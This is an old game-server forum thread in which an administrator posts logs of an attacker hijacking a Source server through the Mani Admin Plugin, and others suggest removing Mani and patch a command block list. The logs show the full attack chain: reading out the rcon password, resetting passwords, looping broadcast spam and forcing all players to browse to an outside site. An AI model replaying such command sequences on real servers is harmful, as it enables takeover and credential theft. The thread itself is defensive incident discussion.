Raised This Month: $7 Target: $400
 1% 

New RCON exploit


Post New Thread Reply   
 
Thread Tools Display Modes
Author Message
zeroibis
Veteran Member
Join Date: Jun 2007
Old 11-02-2009 , 19:53   New RCON exploit
Reply With Quote #1

Quote:
M 11/02/2009 - 16:58:43: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon log off

M 11/02/2009 - 16:58:43: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_xset rcon 0

M 11/02/2009 - 16:58:43: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_xcopy rcon rcon_password

M 11/02/2009 - 16:58:43: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_xset player 0

M 11/02/2009 - 16:58:43: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_xgetuserid player CaM

M 11/02/2009 - 16:58:43: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_tell server_var(player) #multi #green rcon_password is: #default server_var(rcon)
M 11/02/2009 - 16:59:11: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon log off

M 11/02/2009 - 16:59:11: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_xset rcon 0

M 11/02/2009 - 16:59:11: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_xcopy rcon rcon_password

M 11/02/2009 - 16:59:11: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_xset player 0

M 11/02/2009 - 16:59:11: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_xgetuserid player CaM

M 11/02/2009 - 16:59:11: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon es_tell server_var(player) #multi #green rcon_password is: #default server_var(rcon)
M 11/02/2009 - 16:595: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon toggle rcon_password balls
M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 8 "est_playplayer #A radio/roger.wav;es_delayed 0.1 8"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 23 "ma_rcon_Password penis313;es_Delayed 5 23"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 13 "est_effect 10 #a 0 sprites/lgtning.vmt -1150.552246 172.520111 6032.485352 50 220 0.4 10 50 0 255 0 0 200 0;es_delayed 0.1 13"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 12 "est_fade #A 15 999 0 0 0 255 80;es_delayed 0.1 12"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 11 "est_fade #A 15 999 0 0 255 0 80;es_delayed 0.1 11"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 10 "est_fade #A 15 999 0 255 0 0 80;es_delayed 0.1 10"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 9 "es_msg CaM Hacked The Server!!;es_delayed 0.1 9"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 7 "es_msg #lightgreen CaM Hacked The Server!!;es_delayed 0.1 7"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 6 "es_msg #green CaM Hacked The Server!!;es_delayed 0.1 6"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 52 "est_endround LOL 1;es_delayed 1 52"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon alias 53 "est_shake #A 1 200 200;es_delayed 1 53"

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 8

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 23

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 13

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 12

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 11

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 10

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 9

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 7

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 6

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 52

M 11/02/2009 - 17:00:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon 53
M 11/02/2009 - 17:00:51: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_rcon sv_password 123
M 11/02/2009 - 17:01:14: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_cexec_all "ma_browse http://elenore.airinoff.com/cameron/"
M 11/02/2009 - 17:01:17: [MANI_ADMIN_PLUGIN] Admin [CaM] [STEAM_0:1:9665937] Executed : ma_cexec_all "ma_browse http://elenore.airinoff.com/cameron/"
I am running latest SM ES MM 1.7.1 using RCON locker and kerigan anti cheat. I am running mani obviously and WCS.

Also replaced contents of clients.txt with his own data for two other steam accounts in addition to the one used for the hack.

CLIENT UPLOADED THERE OWN FILE to server!
__________________

Last edited by zeroibis; 11-02-2009 at 20:05.
zeroibis is offline
thetwistedpanda
Good Little Panda
Join Date: Sep 2008
Old 11-02-2009 , 19:59   Re: New RCON exploit
Reply With Quote #2

Kerigan's Anti Cheat? Someone's been playing a little Star Craft.

I tried to tell you this in steam chat zero, but there are quite a few Mani takeover scripts going around that do not require sv_cheats or rcon access; it's why I was recommending you rid your servers of it. That being said, this was one of those Mani takeover scripts. Sadly, the author of the script sells it for $15 a pop so they're becoming more and more prevalent. However, you should make sure you have the latest EventScripts version because that may be how your server was targeted (outdated ES has a few nice security holes). Aside from that, I can't stress enough that you get rid of Mani until it's completely fixed (which may never happen).
thetwistedpanda is offline
retsam
Veteran Member
Join Date: Aug 2008
Location: so-cal
Old 11-02-2009 , 20:07   Re: New RCON exploit
Reply With Quote #3

Mani = bad mkay?
retsam is offline
thetwistedpanda
Good Little Panda
Join Date: Sep 2008
Old 11-02-2009 , 20:08   Re: New RCON exploit
Reply With Quote #4

If you'd get on steam Zero, I'd like to discuss something with you.
thetwistedpanda is offline
zeroibis
Veteran Member
Join Date: Jun 2007
Old 11-02-2009 , 20:13   Re: New RCON exploit
Reply With Quote #5

Will do although it looks like random python files have been altered last night on the server and only on this server...
__________________
zeroibis is offline
zeroibis
Veteran Member
Join Date: Jun 2007
Old 11-02-2009 , 20:16   Re: New RCON exploit
Reply With Quote #6

Yea, I plan to toss mani out as soon as vb4 comes out
__________________
zeroibis is offline
devicenull
Veteran Member
Join Date: Mar 2004
Location: CT
Old 11-02-2009 , 20:38   Re: New RCON exploit
Reply With Quote #7

It's Mani. Remove it and you will be fine. This isn't new at all, a bit of searching would have revealed.. this
__________________
Various bits of semi-useful code in a bunch of languages: http://code.devicenull.org/
devicenull is offline
zeroibis
Veteran Member
Join Date: Jun 2007
Old 11-02-2009 , 20:45   Re: New RCON exploit
Reply With Quote #8

devicenull, please use your uber programing voodoo magic to fix this until VB4.0 comes out. I got to hold off until then becuase my sm and vbb databases are merged and the update could kill sourcebans and thus I am delaying the move until 4.0 is released any my plugin that links admins to vbb is shown to work without problem.

So until that can happen I need your uber mods to be updated to protect me! I can send you the souls of a thousand hackers for you to use in making the update if needed!

I tired using an es script called exploit to block ma_rcon but it returns: es_xflags: Could not find var or command: ma_rcon

so maybe it can be done is sm b/c es sux...
__________________

Last edited by zeroibis; 11-02-2009 at 20:56.
zeroibis is offline
devicenull
Veteran Member
Join Date: Mar 2004
Location: CT
Old 11-02-2009 , 21:35   Re: New RCON exploit
Reply With Quote #9

It won't help.. the exploit relies on the changelevel command. For some reason mani fucks this up which means it can execute commands somehow. RCON lock attempts to block it, but depending how mani is installed, it may not.

In rcon lock, find this:
Code:
new String:cheat_flag[][] = { "dumpcountedstrings", "dbghist_dump", "dumpeventqueue", "dump_globals", "physics_select"
	, "physics_debug_entity", "dump_entity_sizes", "dumpentityfactories", "dump_terrain", "mp_dump_timers", "dumpcountedstrings"
	, "mem_dump", "soundscape_flush", "groundlist", "soundlist", "report_touchlinks", "report_entities", "physics_report_active"
	, "listmodels" };
Replace with:
Code:
new String:cheat_flag[][] = { "dumpcountedstrings", "dbghist_dump", "dumpeventqueue", "dump_globals", "physics_select"
	, "physics_debug_entity", "dump_entity_sizes", "dumpentityfactories", "dump_terrain", "mp_dump_timers", "dumpcountedstrings"
	, "mem_dump", "soundscape_flush", "groundlist", "soundlist", "report_touchlinks", "report_entities", "physics_report_active"
	, "listmodels", "changelevel","ma_rcon" };
This may or may not fix the issue you are seeing.
__________________
Various bits of semi-useful code in a bunch of languages: http://code.devicenull.org/
devicenull is offline
10000000
BANNED
Join Date: Oct 2009
Old 11-02-2009 , 23:45   Re: New RCON exploit
Reply With Quote #10

Disable rcon and create something similar using sourcemod
10000000 is offline
Reply


Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT -4. The time now is 07:20.


Powered by vBulletin®
Copyright ©2000 - 2024, vBulletin Solutions, Inc.
Theme made by Freecode